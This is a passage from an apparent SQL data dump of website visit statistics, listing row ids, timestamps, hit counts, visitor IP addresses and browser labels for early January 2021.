1609608189,1,1,0,0,'31.13.127.118','other'),(549443,1609608270,1,1,0,0,'31.13.103.2','other'),(549444,1609608313,1,1,0,0,'69.171.251.6','other'),(549445,1609608316,1,1,0,0,'69.171.251.1','other'),(549446,1609608319,1,1,0,0,'173.252.95.118','other'),(549447,1609608450,1,1,0,0,'66.220.149.2','other'),(549448,1609608525,1,1,0,0,'69.171.251.3','other'),(549449,1609608662,1,1,0,0,'173.252.95.1','other'),(549450,1609608749,1,1,0,0,'66.220.149.18','other'),(549451,1609608753,1,1,0,0,'69.171.251.111','other'),(549452,1609608783,1,1,0,0,'69.171.251.17','other'),(549453,1609609031,1,1,0,0,'173.252.95.16','other'),(549454,1609609032,1,1,0,0,'31.13.127.120','other'),(549455,1609609055,1,1,0,0,'69.171.251.15','other'),(549456,1609609078,1,1,0,0,'31.13.127.7','other'),(549457,1609609103,1,1,0,0,'66.220.149.20','other'),(549458,1609609255,1,1,0,0,'173.252.95.14','other'),(549459,1609609350,1,1,0,0,'69.171.251.21','other'),(549460,1609609402,2,2,0,0,'69.171.251.117','other'),(549461,1609609431,1,1,0,0,'88.155.34.17','chrome'),(549462,1609609435,1,1,0,0,'31.13.103.20','other'),(549463,1609609452,1,1,0,0,'69.171.251.116','other'),(549464,1609609458,1,1,0,0,'66.220.149.28','other'),(549465,1609609530,1,1,0,0,'173.252.127.4','other'),(549466,1609609575,1,1,0,0,'188.163.93.128','chrome'),(549467,1609609621,1,1,0,0,'173.252.95.3','other'),(549468,1609609698,1,1,0,0,'69.171.251.119','other'),(549469,1609609760,1,1,0,0,'69.171.251.8','other'),(549470,1609609780,1,1,0,0,'69.171.251.9','other'),(549471,1609609848,1,1,0,0,'31.13.103.22','other'),(549472,1609609885,1,1,0,0,'66.220.149.3','other'),(549473,1609609930,1,1,0,0,'66.220.149.120','other'),(549474,1609609941,1,1,0,0,'52.188.122.92','chrome'),(549475,1609609950,1,1,0,0,'173.252.95.22','other'),(549476,1609610063,1,1,0,0,'31.13.127.18','other'),(549477,1609610219,1,1,0,0,'66.220.149.6','other'),(549478,1609610263,1,1,0,0,'173.252.95.15','other'),(549479,1609610316,1,1,0,0,'69.171.251.3','other'),(549480,1609610446,1,1,0,0,'69.171.251.7','other'),(549481,1609610449,1,1,0,0,'173.252.95.9','other'),(549482,1609610554,1,1,0,0,'69.171.251.1','other'),(549483,1609610584,1,1,0,0,'31.13.103.20','other'),(549484,1609610674,1,1,0,0,'69.171.251.120','other'),(549485,1609610678,1,1,0,0,'173.252.127.14','other'),(549486,1609610753,1,1,0,0,'66.220.149.31','other'),(549487,1609610889,1,1,0,0,'69.171.251.2','other'),(549490,1609610918,2,2,0,0,'69.171.251.16','other'),(549491,1609610966,1,1,0,0,'173.252.127.9','other'),(549492,1609611007,1,1,0,0,'31.13.103.5','other'),(549493,1609611030,1,1,0,0,'69.171.251.112','other'),(549494,1609611037,1,1,0,0,'173.252.95.1','other'),(549495,1609611144,1,1,0,0,'69.171.251.111','other'),(549496,1609611289,1,1,0,0,'69.171.251.20','other'),(549497,1609611324,1,1,0,0,'173.252.87.10','other'),(549498,1609611632,2,2,0,0,'69.171.251.24','other'),(549499,1609611634,1,1,0,0,'31.13.103.9','other'),(549500,1609611690,1,1,0,0,'173.252.127.17','other'),(549501,1609611746,1,1,0,0,'69.171.251.8','other'),(549502,1609611816,1,1,0,0,'173.252.95.113','other'),(549503,1609611913,1,1,0,0,'69.171.251.11','other'),(549504,1609612078,1,1,0,0,'69.171.251.111','other'),(549505,1609612081,1,1,0,0,'173.252.95.119','other'),(549506,1609612131,2,2,0,0,'66.220.149.31','other'),(549507,1609612421,1,1,0,0,'69.171.251.120','other'),(549508,1609612487,1,1,0,0,'69.171.251.117','other'),(549509,1609612490,1,1,0,0,'173.252.95.1','other'),(549510,1609612664,1,1,0,0,'173.252.127.21','other'),(549511,1609612665,1,1,0,0,'173.252.111.11','other'),(549512,1609612700,1,1,0,0,'173.252.95.10','other'),(549513,1609612707,1,1,0,0,'88.155.156.129','chrome'),(549514,1609612822,1,1,0,0,'69.171.251.27','other'),(549515,1609612825,1,1,0,0,'69.171.251.1','other'),(549516,1609612882,1,1,0,0,'173.252.95.14','other'),(549517,1609612917,1,1,0,0,'31.13.103.21','other'),(549518,1609612926,1,1,0,0,'31.13.103.112','other'),(549519,1609612928,1,1,0,0,'69.171.251.2','other'),(549520,1609612970,1,1,0,0,'66.220.149.27','other'),(549521,1609612999,1,1,0,0,'178.165.33.73','other'),(549522,1609613133,1,1,0,0,'66.220.149.33','other'),(549523,1609613137,1,1,0,0,'69.171.251.113','other'),(549524,1609613183,1,1,0,0,'173.252.127.118','other'),(549525,1609613212,1,1,0,0,'66.220.149.2','other'),(549526,1609613227,1,1,0,0,'185.76.69.170','chrome'),(549527,1609613266,1,1,0,0,'69.171.251.15','other'),(549528,1609613325,1,1,0,0,'31.13.103.3','other'),(549529,1609613349,1,1,0,0,'173.252.95.113','other'),(549530,1609613352,1,1,0,0,'173.252.127.3','other'),(549531,1609613420,1,1,0,0,'69.171.251.22','other'),(549532,1609613672,2,2,0,0,'69.171.251.4','other'),(549533,1609613743,1,1,0,0,'69.171.251.28','other'),(549534,1609613760,1,1,0,0,'173.252.95.117','other'),(549535,1609613784,1,1,0,0,'69.171.251.111','other'),(549536,1609613805,1,1,0,0,'173.252.127.28','other'),(549537,1609613820,1,1,0,0,'69.171.251.119','other'),(549538,1609613845,1,1,0,0,'31.13.103.11','other'),(549539,1609613965,1,1,0,0,'66.220.149.1','other'),(549540,1609613972,1,1,0,0,'173.252.95.18','other'),(549541,1609613979,1,1,0,0,'91.231.42.143','chrome'),(549542,1609614060,2,2,0,0,'66.220.149.4','other'),(549543,1609614085,1,1,0,0,'173.252.127.14','other'),(549544,1609614229,1,1,0,0,'69.171.251.117','other'),(549545,1609614337,1,1,0,0,'69.171.251.2','other'),(549546,1609614471,1,1,0,0,'69.171.251.13','other'),(549547,1609614664,1,1,0,0,'66.220.149.31','other'),(549548,1609614680,1,1,0,0,'69.171.251.10','other'),(549549,1609614703,1,1,0,0,'173.252.95.119','other'),(549550,1609614775,2,2,0,0,'69.171.251.24','other'),(549551,1609615035,1,1,0,0,'173.252.127.5','other'),(549552,1609615272,1,1,0,0,'66.220.149.26','other'),(549553,1609615450,1,1,0,0,'69.171.251.18','other'),(549554,1609615666,1,1,0,0,'69.171.251.19','other'),(549555,1609615692,1,1,0,0,'173.252.95.116','other'),(549556,1609615697,1,1,0,0,'69.171.251.111','other'),(549557,1609615792,1,1,0,0,'31.13.115.113','other'),(549558,1609615826,2,2,0,0,'69.171.251.112','other'),(549559,1609615874,1,1,0,0,'195.114.121.174','chrome'),(549560,1609615992,1,1,0,0,'173.252.127.6','other'),(549561,1609616066,1,1,0,0,'66.220.149.36','other'),(549562,1609616334,1,1,0,0,'66.220.149.28','other'),(549563,1609616492,1,1,0,0,'69.171.251.120','other'),(549564,1609616512,1,1,0,0,'69.171.251.15','other'),(549565,1609616576,1,1,0,0,'173.252.127.4','other'),(549566,1609616822,1,1,0,0,'173.252.95.20','other'),(549567,1609616863,1,1,0,0,'69.171.251.4','other'),(549568,1609616883,2,2,0,0,'173.252.127.118','other'),(549569,1609617049,1,1,0,0,'66.220.149.7','other'),(549570,1609617055,1,1,0,0,'31.43.244.227','chrome'),(549571,1609617073,1,1,0,0,'31.13.115.4','other'),(549572,1609617090,1,1,0,0,'176.125.36.10','chrome'),(549573,1609617453,1,1,0,0,'69.171.251.116','other'),(549574,1609617597,1,1,0,0,'173.252.95.2','other'),(549575,1609617903,1,1,0,0,'64.140.141.81','chrome'),(549576,1609618044,1,1,0,0,'69.171.251.12','other'),(549577,1609618059,2,2,0,0,'69.171.251.26','other'),(549578,1609618501,1,1,0,0,'69.171.251.119','other'),(549579,1609618506,1,1,0,0,'69.171.251.14','other'),(549580,1609618515,1,1,0,0,'173.252.95.112','other'),(549581,1609618644,1,1,0,0,'69.171.251.8','other'),(549582,1609618767,1,1,0,0,'173.252.127.5','other'),(549583,1609618858,1,1,0,0,'66.220.149.37','other'),(549584,1609619116,1,1,0,0,'69.171.251.3','other'),(549585,1609619398,1,1,0,0,'69.171.251.18','other'),(549586,1609619404,1,1,0,0,'173.252.95.14','other'),(549587,1609619484,1,1,0,0,'173.252.127.10','other'),(549588,1609619505,1,1,0,0,'69.171.251.21','other'),(549589,1609619609,1,1,0,0,'69.171.251.13','other'),(549590,1609619610,1,1,0,0,'66.220.149.111','other'),(549591,1609619711,1,1,0,0,'69.171.251.120','other'),(549592,1609619916,2,2,0,0,'69.171.251.14','other'),(549593,1609619941,1,1,0,0,'66.220.149.31','other'),(549594,1609620023,1,1,0,0,'173.252.127.117','other'),(549595,1609620252,1,1,0,0,'173.252.95.112','other'),(549596,1609620263,1,1,0,0,'69.171.251.112','other'),(549597,1609620265,1,1,0,0,'69.171.251.22','other'),(549598,1609620343,1,1,0,0,'69.171.251.24','other'),(549599,1609620485,1,1,0,0,'173.252.95.8','other'),(549600,1609620522,1,1,0,0,'69.171.251.3','other'),(549601,1609620524,2,2,0,0,'69.171.251.15','other'),(549602,1609620560,1,1,0,0,'69.171.251.111','other'),(549603,1609620603,1,1,0,0,'66.220.149.8','other'),(549604,1609620657,1,1,0,0,'69.171.251.4','other'),(549605,1609620682,1,1,0,0,'176.121.6.46','chrome'),(549606,1609620859,1,1,0,0,'69.171.251.7','other'),(549607,1609620866,1,1,0,0,'173.252.95.24','other'),(549608,1609620885,1,1,0,0,'173.252.127.1','other'),(549609,1609620925,1,1,0,0,'69.171.251.11','other'),(549610,1609621025,1,1,0,0,'69.171.251.13','other'),(549611,1609621193,1,1,0,0,'31.13.127.18','other'),(549612,1609621369,1,1,0,0,'173.252.127.29','other'),(549613,1609621464,1,1,0,0,'66.220.149.21','other'),(549614,1609621704,1,1,0,0,'69.171.251.23','other'),(549615,1609621739,1,1,0,0,'173.252.95.113','other'),(549616,1609621806,1,1,0,0,'31.13.103.112','other'),(549617,1609621867,1,1,0,0,'69.171.251.15','other'),(549618,1609621872,1,1,0,0,'173.252.127.117','other'),(549619,1609621890,1,1,0,0,'173.252.95.3','other'),(549620,1609621917,1,1,0,0,'69.171.251.112','other'),(549621,1609621966,1,1,0,0,'69.171.251.20','other'),(549622,1609621998,1,1,0,0,'69.171.251.26','other'),(549623,1609622224,1,1,0,0,'31.13.127.12','other'),(549624,1609622435,1,1,0,0,'173.252.95.11','other'),(549625,1609622443,1,1,0,0,'173.252.127.9','other'),(549626,1609622460,2,2,0,0,'69.171.251.1','other'),(549627,1609622972,1,1,0,0,'69.171.251.17','other'),(549628,1609623026,1,1,0,0,'66.220.149.12','other'),(549629,1609623054,1,1,0,0,'173.252.127.19','other'),(549630,1609623111,1,1,0,0,'173.252.95.24','other'),(549631,1609623270,1,1,0,0,'173.252.127.12','other'),(549632,1609623296,2,2,0,0,'69.171.251.2','other'),(549633,1609623297,1,1,0,0,'69.171.251.10','other'),(549634,1609623367,1,1,0,0,'173.252.95.19','other'),(549635,1609623825,1,1,0,0,'173.252.95.1','other'),(549636,1609624221,1,1,0,0,'173.252.95.4','other'),(549637,1609624314,1,1,0,0,'173.252.95.20','other'),(549638,1609624442,1,1,0,0,'173.252.95.118','other'),(549639,1609624496,1,1,0,0,'69.171.251.10','other'),(549640,1609624619,1,1,0,0,'69.171.251.117','other'),(549641,1609624620,1,1,0,0,'69.171.251.2','other'),(549642,1609624769,1,1,0,0,'66.220.149.12','other'),(549643,1609624825,1,1,0,0,'173.252.127.32','other'),(549644,1609624827,1,1,0,0,'173.252.95.9','other'),(549645,1609624859,1,1,0,0,'69.171.249.1','other'),(549646,1609624860,1,1,0,0,'69.171.249.3','other'),(549647,1609625056,1,1,0,0,'31.13.115.120','other'),(549648,1609625082,1,1,0,0,'173.252.95.120','other'),(549649,1609625139,1,1,0,0,'173.252.127.31','other'),(549650,1609625274,1,1,0,0,'31.13.127.2','other'),(549651,1609625305,1,1,0,0,'69.171.251.19','other'),(549652,1609625429,1,1,0,0,'69.171.251.8','other'),(549653,1609626855,1,1,0,0,'69.171.251.15','other'),(549654,1609627202,1,1,0,0,'31.13.127.20','other'),(549655,1609627440,1,1,0,0,'173.252.95.17','other'),(549656,1609627712,1,1,0,0,'69.171.251.26','other'),(549657,1609627713,1,1,0,0,'69.171.251.14','other'),(549658,1609627863,1,1,0,0,'66.220.149.29','other'),(549659,1609628482,1,1,0,0,'173.252.95.113','other'),(549660,1609628523,1,1,0,0,'66.220.149.14','other'),(549661,1609628586,1,1,0,0,'66.220.149.27','other'),(549662,1609628962,1,1,0,0,'173.252.95.2','other'),(549663,1609629115,1,1,0,0,'173.252.127.15','other'),(549664,1609629148,1,1,0,0,'69.171.251.8','other'),(549665,1609629379,1,1,0,0,'66.220.149.19','other'),(549666,1609629458,1,1,0,0,'66.220.149.13','other'),(549667,1609629557,1,1,0,0,'173.252.95.21','other'),(549668,1609629770,1,1,0,0,'66.220.149.22','other'),(549669,1609630715,1,1,0,0,'69.171.251.13','other'),(549670,1609630986,1,1,0,0,'66.220.149.118','other'),(549671,1609631625,1,1,0,0,'66.220.149.120','other'),(549672,1609631665,1,1,0,0,'173.252.95.6','other'),(549673,1609631667,1,1,0,0,'69.171.251.19','other'),(549674,1609632854,1,1,0,0,'31.13.127.3','other'),(549676,1609633387,1,1,0,0,'31.13.115.120','other'),(549677,1609634870,1,1,0,0,'173.252.95.23','other'),(549678,1609634873,1,1,0,0,'173.252.127.112','other'),(549679,1609636632,2,2,0,0,'66.220.149.32','other'),(549680,1609638167,1,1,0,0,'66.220.149.22','other'),(549681,1609639509,1,1,0,0,'173.252.127.118','other'),(549682,1609639925,1,1,0,0,'173.252.95.19','other'),(549683,1609640242,1,1,0,0,'173.252.127.14','other'),(549684,1609642933,1,1,0,0,'66.220.149.27','other'),(549685,1609643268,2,2,0,0,'173.252.95.119','other'),(549686,1609643286,1,1,0,0,'69.171.251.14','other'),(549687,1609643341,1,1,0,0,'173.252.95.118','other'),(549688,1609644154,1,0,1,0,'66.249.70.43',''),(549689,1609644175,1,1,0,0,'69.171.251.8','other'),(549690,1609644926,1,1,0,0,'69.171.251.120','other'),(549691,1609645331,1,1,0,0,'31.13.103.118','other'),(549692,1609646381,1,1,0,0,'173.252.95.21','other'),(549693,1609646442,1,1,0,0,'66.249.70.43','chrome'),(549694,1609646658,1,1,0,0,'94.153.6.57','chrome'),(549695,1609646750,1,1,0,0,'173.252.95.9','other'),(549696,1609646765,1,1,0,0,'66.220.149.23','other'),(549697,1609647113,2,2,0,0,'69.171.251.13','other'),(549698,1609649219,1,1,0,0,'173.252.95.10','other'),(549699,1609649290,1,1,0,0,'173.252.127.20','other'),(549700,1609649299,1,1,0,0,'173.252.95.4','other'),(549701,1609649390,2,2,0,0,'69.171.251.17','other'),(549702,1609649754,1,1,0,0,'173.252.95.119','other'),(549703,1609651473,1,1,0,0,'173.252.95.19','other'),(549704,1609651585,1,1,0,0,'66.220.149.16','other'),(549705,1609651616,1,1,0,0,'66.220.149.18','other'),(549706,1609651868,1,1,0,0,'173.252.95.12','other'),(549707,1609651876,1,1,0,0,'173.252.127.12','other'),(549708,1609652033,1,1,0,0,'185.237.217.11','chrome'),(549709,1609653095,1,1,0,0,'69.171.251.27','other'),(549710,1609653240,1,1,0,0,'66.220.149.25','other'),(549711,1609653557,1,1,0,0,'173.252.95.111','other'),(549712,1609653571,1,1,0,0,'173.252.127.15','other'),(549713,1609653950,1,1,0,0,'66.220.149.4','other'),(549714,1609654172,1,1,0,0,'173.252.95.19','other'),(549715,1609654569,1,1,0,0,'46.133.196.65','chrome'),(549716,1609654840,1,1,0,0,'173.252.127.19','other'),(549717,1609655045,1,1,0,0,'69.171.251.27','other'),(549718,1609655071,1,1,0,0,'173.252.95.119','other'),(549719,1609655304,1,1,0,0,'5.58.155.28','chrome'),(549720,1609655369,1,1,0,0,'64.140.141.49','chrome'),(549721,1609655419,1,1,0,0,'69.171.251.20','other'),(549722,1609655706,1,1,0,0,'173.252.127.14','other'),(549723,1609656050,1,0,1,0,'66.249.70.47',''),(549725,1609656870,1,1,0,0,'173.252.95.15','other'),(549727,1609656925,1,1,0,0,'66.220.149.7','other'),(549728,1609656957,1,1,0,0,'69.171.251.14','other'),(549729,1609657100,1,1,0,0,'69.171.251.21','other'),(549731,1609657275,1,1,0,0,'173.252.95.120','other'),(549732,1609657484,1,1,0,0,'69.171.251.10','other'),(549733,1609657765,1,1,0,0,'66.220.149.21','other'),(549734,1609657766,1,1,0,0,'66.220.149.5','other'),(549735,1609657824,1,1,0,0,'69.171.251.119','other'),(549736,1609658230,1,1,0,0,'69.171.251.8','other'),(549737,1609658563,1,1,0,0,'69.171.251.14','other'),(549738,1609658577,1,1,0,0,'173.252.95.119','other'),(549739,1609658800,1,1,0,0,'31.13.115.10','other'),(549740,1609658888,1,1,0,0,'69.171.251.119','other'),(549741,1609659073,1,1,0,0,'69.171.251.112','other'),(549742,1609659182,1,1,0,0,'31.13.103.22','other'),(549743,1609659428,1,1,0,0,'31.13.127.9','other'),(549744,1609659731,1,1,0,0,'173.252.95.4','other'),(549745,1609659733,1,1,0,0,'69.171.251.111','other'),(549746,1609659989,1,1,0,0,'69.171.251.8','other'),(549747,1609660080,1,1,0,0,'69.171.251.9','other'),(549748,1609660081,1,1,0,0,'173.252.95.1','other'),(549749,1609660468,2,2,0,0,'173.252.95.2','other'),(549750,1609660494,1,1,0,0,'195.114.121.173','chrome'),(549751,1609660543,1,1,0,0,'173.252.127.29','other'),(549752,1609660544,1,1,0,0,'69.171.251.120','other'),(549753,1609660841,2,2,0,0,'173.252.95.119','other'),(549754,1609661130,1,1,0,0,'69.171.251.13','other'),(549755,1609661180,1,1,0,0,'66.220.149.34','other'),(549756,1609661225,1,1,0,0,'173.252.95.14','other'),(549757,1609661297,1,1,0,0,'69.171.251.12','other'),(549758,1609661331,1,1,0,0,'31.13.127.4','other'),(549759,1609661396,1,1,0,0,'69.171.251.20','other'),(549760,1609662210,1,1,0,0,'31.13.103.117','other'),(549761,1609662427,1,1,0,0,'69.171.251.10','other'),(549762,1609662827,1,1,0,0,'173.252.95.5','other'),(549763,1609662913,1,1,0,0,'173.252.127.113','other'),(549764,1609663321,1,1,0,0,'217.196.161.227','chrome'),(549765,1609663376,1,1,0,0,'31.13.127.22','other'),(549766,1609663377,1,1,0,0,'31.13.127.5','other'),(549767,1609663447,1,1,0,0,'66.220.149.119','other'),(549768,1609663490,1,1,0,0,'173.252.95.14','other'),(549769,1609663590,1,1,0,0,'173.252.127.111','other'),(549770,1609664354,1,1,0,0,'173.252.127.14','other'),(549771,1609664442,1,1,0,0,'173.252.95.10','other'),(549772,1609665128,1,1,0,0,'173.252.95.21','other'),(549773,1609666627,1,1,0,0,'173.252.95.118','other'),(549774,1609666671,1,1,0,0,'173.252.127.10','other'),(549775,1609666735,1,1,0,0,'69.171.251.4','other'),(549776,1609666962,2,2,0,0,'173.252.95.9','other'),(549777,1609667646,1,1,0,0,'31.13.103.23','other'),(549778,1609667678,1,1,0,0,'69.171.251.6','other'),(549779,1609667932,1,1,0,0,'173.252.95.15','other'),(549780,1609668149,1,1,0,0,'69.171.251.111','other'),(549781,1609668395,1,1,0,0,'66.220.149.111','other'),(549782,1609668639,1,1,0,0,'69.171.251.14','other'),(549783,1609668747,1,1,0,0,'69.171.251.2','other'),(549784,1609668941,1,1,0,0,'173.252.127.113','other'),(549785,1609668999,1,1,0,0,'173.252.95.19','other'),(549786,1609669345,2,2,0,0,'66.220.149.34','other'),(549787,1609669369,1,1,0,0,'173.252.95.5','other'),(549788,1609669533,1,1,0,0,'69.171.251.6','other'),(549789,1609669586,1,1,0,0,'173.252.95.13','other'),(549790,1609669976,1,1,0,0,'66.220.149.17','other'),(549791,1609670293,1,1,0,0,'69.171.251.16','other'),(549792,1609670373,1,1,0,0,'69.171.251.11','other'),(549793,1609670380,1,1,0,0,'173.252.95.24','other'),(549794,1609670515,1,1,0,0,'69.171.251.116','other'),(549795,1609670739,1,1,0,0,'66.220.149.25','other'),(549796,1609671315,1,1,0,0,'173.252.95.4','other'),(549797,1609671411,1,1,0,0,'69.171.251.3','other'),(549798,1609671613,1,1,0,0,'69.171.251.17','other'),(549799,1609672130,1,1,0,0,'173.252.127.6','other'),(549800,1609672149,1,1,0,0,'69.171.251.12','other'),(549801,1609672502,1,1,0,0,'69.171.251.19','other'),(549802,1609672638,1,1,0,0,'173.252.95.1','other'),(549803,1609672644,1,1,0,0,'69.171.251.18','other'),(549804,1609672677,1,1,0,0,'31.13.103.7','other'),(549805,1609672711,1,1,0,0,'66.220.149.2','other'),(549806,1609672824,1,1,0,0,'194.44.133.166','chrome'),(549807,1609672877,1,1,0,0,'173.252.95.112','other'),(549808,1609673236,1,1,0,0,'66.220.149.35','other'),(549809,1609673361,1,1,0,0,'69.171.251.16','other'),(549810,1609673376,1,1,0,0,'173.252.95.15','other'),(549811,1609673655,1,1,0,0,'173.252.95.8','other'),(549812,1609674093,1,1,0,0,'69.171.251.2','other'),(549813,1609674339,1,1,0,0,'69.171.251.119','other'),(549814,1609674657,1,1,0,0,'173.252.95.2','other'),(549815,1609674907,1,1,0,0,'173.252.127.120','other'),(549816,1609674990,1,1,0,0,'173.252.95.11','other'),(549817,1609675007,1,1,0,0,'69.171.251.6','other'),(549818,1609675783,1,1,0,0,'66.220.149.29','other'),(549819,1609675975,1,1,0,0,'173.252.95.111','other'),(549820,1609676242,1,1,0,0,'69.171.251.6','other'),(549821,1609677265,1,1,0,0,'173.252.95.16','other'),(549822,1609677412,1,1,0,0,'69.171.251.116','other'),(549823,1609677643,1,1,0,0,'173.252.95.2','other'),(549824,1609677655,1,1,0,0,'173.252.127.19','other'),(549825,1609677744,1,1,0,0,'31.13.103.3','other'),(549826,1609677759,1,1,0,0,'31.13.127.2','other'),(549827,1609677763,1,1,0,0,'69.171.251.7','other'),(549828,1609678113,1,1,0,0,'173.252.95.117','other'),(549829,1609678119,1,1,0,0,'94.153.13.247','chrome'),(549830,1609678374,1,1,0,0,'31.13.127.3','other'),(549831,1609678473,1,1,0,0,'69.171.251.15','other'),(549832,1609678745,1,1,0,0,'66.220.149.26','other'),(549833,1609678784,1,1,0,0,'173.252.95.120','other'),(549834,1609678785,1,1,0,0,'173.252.95.7','other'),(549835,1609680254,1,1,0,0,'173.252.127.25','other'),(549837,1609681344,1,1,0,0,'66.220.149.10','other'),(549838,1609681377,1,1,0,0,'173.252.95.111','other'),(549839,1609681481,1,1,0,0,'173.252.95.6','other'),(549840,1609681483,1,1,0,0,'69.171.251.112','other'),(549841,1609681546,1,1,0,0,'69.171.251.116','other'),(549842,1609681595,1,1,0,0,'69.171.251.16','other'),(549843,1609681697,1,1,0,0,'69.171.251.11','other'),(549844,1609681945,1,1,0,0,'31.13.103.7','other'),(549845,1609682160,1,1,0,0,'66.220.149.37','other'),(549846,1609682187,1,1,0,0,'94.153.89.83','chrome'),(549847,1609682754,1,1,0,0,'66.220.149.20','other'),(549848,1609683140,1,1,0,0,'173.252.127.12','other'),(549849,1609683207,1,1,0,0,'173.252.95.20','other'),(549850,1609683220,1,1,0,0,'31.13.103.3','other'),(549851,1609683419,1,1,0,0,'66.220.149.1','other'),(549852,1609683569,1,1,0,0,'69.171.251.13','other'),(549853,1609683737,1,1,0,0,'173.252.95.120','other'),(549854,1609683974,1,1,0,0,'69.171.251.23','other'),(549855,1609684034,2,2,0,0,'31.13.103.11','other'),(549856,1609684719,1,1,0,0,'173.252.95.12','other'),(549857,1609684957,1,1,0,0,'173.252.95.4','other'),(549858,1609684976,1,1,0,0,'69.171.251.17','other'),(549859,1609685039,1,1,0,0,'146.120.170.10','chrome'),(549860,1609685404,1,1,0,0,'173.252.127.3','other'),(549861,1609685470,1,1,0,0,'66.220.149.7','other'),(549862,1609686063,1,1,0,0,'173.252.95.116','other'),(549863,1609686081,1,1,0,0,'69.171.251.8','other'),(549864,1609686200,1,1,0,0,'173.252.95.120','other'),(549865,1609686219,1,1,0,0,'173.252.127.17','other'),(549866,1609686388,1,1,0,0,'69.171.251.27','other'),(549867,1609686773,2,2,0,0,'69.171.251.3','other'),(549868,1609686811,1,1,0,0,'91.245.124.47','chrome'),(549869,1609687549,1,1,0,0,'66.220.149.5','other'),(549870,1609687567,1,1,0,0,'173.252.95.19','other'),(549871,1609687581,1,1,0,0,'46.175.165.7','chrome'),(549872,1609687767,1,1,0,0,'173.252.95.27','other'),(549873,1609687772,1,1,0,0,'173.252.127.2','other'),(549874,1609688320,1,1,0,0,'69.171.251.9','other'),(549875,1609688448,1,1,0,0,'173.252.127.20','other'),(549876,1609688513,1,1,0,0,'69.171.251.4','other'),(549877,1609689410,1,1,0,0,'173.252.95.116','other'),(549878,1609689412,1,1,0,0,'69.171.251.17','other'),(549879,1609689581,1,1,0,0,'69.171.251.10','other'),(549880,1609689806,1,1,0,0,'66.220.149.6','other'),(549881,1609689815,1,1,0,0,'66.220.149.24','other'),(549882,1609689950,1,1,0,0,'66.220.149.10','other'),(549883,1609690200,1,1,0,0,'69.171.251.12','other'),(549884,1609690300,1,1,0,0,'31.13.127.9','other'),(549885,1609690326,1,1,0,0,'66.220.149.16','other'),(549886,1609690344,1,1,0,0,'173.252.95.28','other'),(549887,1609690587,1,0,1,0,'66.249.70.47',''),(549888,1609690683,1,1,0,0,'66.249.70.45','chrome'),(549889,1609690750,1,1,0,0,'69.171.251.4','other'),(549890,1609690755,1,1,0,0,'69.171.251.30','other'),(549891,1609690823,1,1,0,0,'66.220.149.17','other'),(549892,1609690894,2,2,0,0,'66.249.70.43','chrome'),(549893,1609691286,1,1,0,0,'173.252.95.120','other'),(549894,1609691320,3,3,0,0,'23.228.109.146','chrome'),(549895,1609691433,1,1,0,0,'69.171.251.18','other'),(549896,1609691512,1,1,0,0,'31.13.127.8','other'),(549897,1609691519,1,1,0,0,'69.171.251.2','other'),(549898,1609691602,1,1,0,0,'173.252.95.7','other'),(549899,1609691892,1,1,0,0,'173.252.95.27','other'),(549900,1609691910,1,1,0,0,'69.171.251.21','other'),(549901,1609692072,1,1,0,0,'173.252.127.3','other'),(549902,1609692505,1,1,0,0,'69.171.251.2','other'),(549903,1609692673,1,1,0,0,'69.171.251.6','other'),(549904,1609692941,1,1,0,0,'69.171.251.12','other'),(549906,1609692985,1,1,0,0,'69.171.251.25','other'),(549907,1609693093,1,1,0,0,'69.171.251.113','other'),(549908,1609693123,1,1,0,0,'66.220.149.119','other'),(549909,1609693278,1,1,0,0,'176.121.5.6','chrome'),(549910,1609693818,1,1,0,0,'173.252.95.119','other'),(549911,1609693941,1,1,0,0,'69.171.251.29','other'),(549912,1609694166,1,1,0,0,'173.252.127.24','other'),(549913,1609694177,1,1,0,0,'69.171.251.17','other'),(549914,1609694385,1,1,0,0,'173.252.95.5','other'),(549915,1609695453,1,1,0,0,'31.13.127.13','other'),(549916,1609695722,1,1,0,0,'66.220.149.118','other'),(549917,1609695768,1,1,0,0,'31.13.127.118','other'),(549918,1609696162,1,1,0,0,'69.171.251.111','other'),(549919,1609696173,1,1,0,0,'69.171.251.118','other'),(549920,1609696175,1,1,0,0,'173.252.95.24','other'),(549921,1609697054,1,1,0,0,'69.171.251.14','other'),(549922,1609697094,1,1,0,0,'173.252.95.30','other'),(549923,1609697491,1,1,0,0,'66.220.149.27','other'),(549924,1609697671,1,1,0,0,'69.171.251.6','other'),(549925,1609697721,1,1,0,0,'173.252.111.111','other'),(549926,1609698166,1,1,0,0,'66.220.149.32','other'),(549927,1609698303,1,1,0,0,'69.171.251.25','other'),(549928,1609698769,1,1,0,0,'66.220.149.7','other'),(549929,1609699134,1,1,0,0,'69.171.251.119','other'),(549930,1609699211,1,1,0,0,'173.252.95.17','other'),(549931,1609699300,1,1,0,0,'69.171.251.111','other'),(549932,1609699305,1,1,0,0,'31.13.103.111','other'),(549933,1609699631,1,1,0,0,'69.171.251.26','other'),(549934,1609699673,1,1,0,0,'69.171.251.30','other'),(549935,1609699678,1,1,0,0,'176.108.106.48','chrome'),(549936,1609699710,1,1,0,0,'69.171.251.1','other'),(549937,1609700071,1,1,0,0,'66.220.149.33','other'),(549938,1609700080,1,1,0,0,'173.252.127.13','other'),(549939,1609700096,1,1,0,0,'69.171.251.15','other'),(549940,1609700191,1,1,0,0,'31.13.127.19','other'),(549941,1609700323,1,1,0,0,'31.13.103.4','other'),(549942,1609700738,1,1,0,0,'69.171.251.18','other'),(549943,1609700867,1,1,0,0,'173.252.95.17','other'),(549944,1609700869,1,1,0,0,'69.171.251.116','other'),(549945,1609701209,1,1,0,0,'173.252.95.2','other'),(549946,1609701251,1,1,0,0,'69.171.251.112','other'),(549947,1609701515,1,1,0,0,'173.252.95.19','other'),(549948,1609702193,1,1,0,0,'31.13.103.113','other'),(549949,1609702749,1,1,0,0,'66.220.149.22','other'),(549950,1609702850,1,1,0,0,'69.171.251.17','other'),(549951,1609702916,1,1,0,0,'173.252.95.4','other'),(549952,1609702917,1,1,0,0,'69.171.251.19','other'),(549953,1609703862,1,1,0,0,'31.13.127.13','other'),(549955,1609704556,1,1,0,0,'69.171.251.16','other'),(549956,1609705424,1,1,0,0,'69.171.251.15','other'),(549957,1609705436,1,1,0,0,'173.252.127.20','other'),(549958,1609705655,1,1,0,0,'173.252.95.13','other'),(549959,1609705684,1,1,0,0,'66.220.149.36','other'),(549960,1609705961,1,1,0,0,'69.171.251.5','other'),(549961,1609706282,1,1,0,0,'173.252.95.1','other'),(549962,1609706384,1,1,0,0,'69.171.251.18','other'),(549963,1609706690,1,1,0,0,'69.171.251.32','other'),(549964,1609706710,1,1,0,0,'173.252.95.120','other'),(549965,1609707335,1,1,0,0,'173.252.95.2','other'),(549966,1609707427,1,1